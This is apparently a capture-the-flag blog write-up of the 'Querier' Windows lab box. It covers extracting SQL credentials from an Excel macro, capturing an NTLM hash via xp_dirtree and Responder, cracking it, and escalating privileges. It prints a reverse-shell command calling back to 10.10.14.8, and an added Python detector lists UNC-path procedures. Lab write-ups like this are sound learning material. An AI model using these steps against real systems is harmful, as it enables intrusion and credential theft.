Sat. Oct 24th, 2020

Pentesting Fun Stuff

following the cyber security path…

Querier

Enumeration

Starting off with a portscan.

No webserver and some services which you need credentials for to make a connection.

SMB

The share Reports is not default.

Looks like just one Excel file.

EXCEL

To check an OLE file on Kali there are several tools. This site has a nice overview.

It looks like the macro is recorded to make a connection with the SQL server, database Volume, and it also contains the credentials it uses.

MSSQL

For a connection with the MSSQL server Impacket has a Python script which can help.

This user has no permission to perform this action. After browsing the internet I found a page with some nice information.

First starting up Responder.

Then use the command xp_dirtree to connect to my IP.

And capture the hash with Responder.
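From the defender's side, the UNC-path trick above (xp_dirtree and its sibling procedures) leaves a trace in the SQL Server statement audit: the procedure call itself, with a UNC path pointing at a host that is not one of the organisation's file servers. The following is an added example, not code from the original post, that scans constructed audit lines and flags such calls; the internal networks and host names are assumptions.

```python
import re
import ipaddress

# Constructed sample of SQL Server statement-audit lines (not real log data).
SAMPLE_LOG = """\
2020-10-24 10:01:02 app_user EXEC master..xp_dirtree '\\\\10.10.14.8\\share', 1, 1
2020-10-24 10:01:05 app_user SELECT name FROM sys.databases
2020-10-24 10:02:11 svc_backup EXEC xp_fileexist '\\\\fileserver.corp.local\\backup\\db.bak'
2020-10-24 10:03:44 app_user EXEC master.dbo.xp_subdirs '\\\\172.16.5.20\\c$'
"""

# Extended stored procedures that make the SQL Server service account
# authenticate (NTLM) to whatever host the UNC path names.
UNC_PROCS = ("xp_dirtree", "xp_fileexist", "xp_subdirs")
PATTERN = re.compile(
    r"(?P<proc>" + "|".join(UNC_PROCS) + r")\s+'(?P<path>\\\\[^']+)'",
    re.IGNORECASE,
)

# Assumed allow-list: where the service account is legitimately expected to connect.
INTERNAL_NETS = [ipaddress.ip_network("172.16.0.0/12")]
INTERNAL_HOSTS = {"fileserver.corp.local"}


def unc_host(path):
    """Return the host component of a UNC path like \\\\host\\share\\dir."""
    return path.lstrip("\\").split("\\", 1)[0]


def is_internal(host):
    """True if the host is an allow-listed name or an address inside INTERNAL_NETS."""
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return host.lower() in INTERNAL_HOSTS
    return any(addr in net for net in INTERNAL_NETS)


def find_suspicious_unc_calls(log_text):
    """Return the UNC-taking procedure calls whose target host is not internal."""
    hits = []
    for line in log_text.splitlines():
        m = PATTERN.search(line)
        if not m:
            continue
        host = unc_host(m.group("path"))
        if not is_internal(host):
            hits.append({"proc": m.group("proc").lower(), "host": host, "line": line})
    return hits
```

In the sample only the xp_dirtree call to 10.10.14.8 is flagged; the two calls to allow-listed destinations pass. Denying EXECUTE on these procedures to application logins removes the trick altogether.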

CRACKING THE HASH

Because I run my Kali in a VM I use John instead of Hashcat.

There is the password.

The last user didn't have permission. Let's see if it is different with this user.

Looks like I can run commands with this user.

Getting some system information.

REVERSE SHELL

Time to get a reverse shell, which will give more freedom on this box. For this Kali has a folder with handy files, /usr/share/nishang. From this folder I copy a ps1 file to my working folder.

Then add a line to the bottom of the file: Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.8 -Port 9999

Now to get this file to the remote system. On my local machine I start a python server on port 80.

On this site there is a command to download and execute the file.

PRIVILEGE ESCALATION

On the Desktop of this user is the first flag.

On this github page there are some excellent PowerShell scripts. One of them is PowerUp.ps1, which is like LinEnum.sh for Linux.

The script finds several things and one of them is a password in plaintext.


With this account I have read and write permission.

Now for the final flag.

And there we have it. A really nice box with some challenges. And finally a Windows machine for a change.
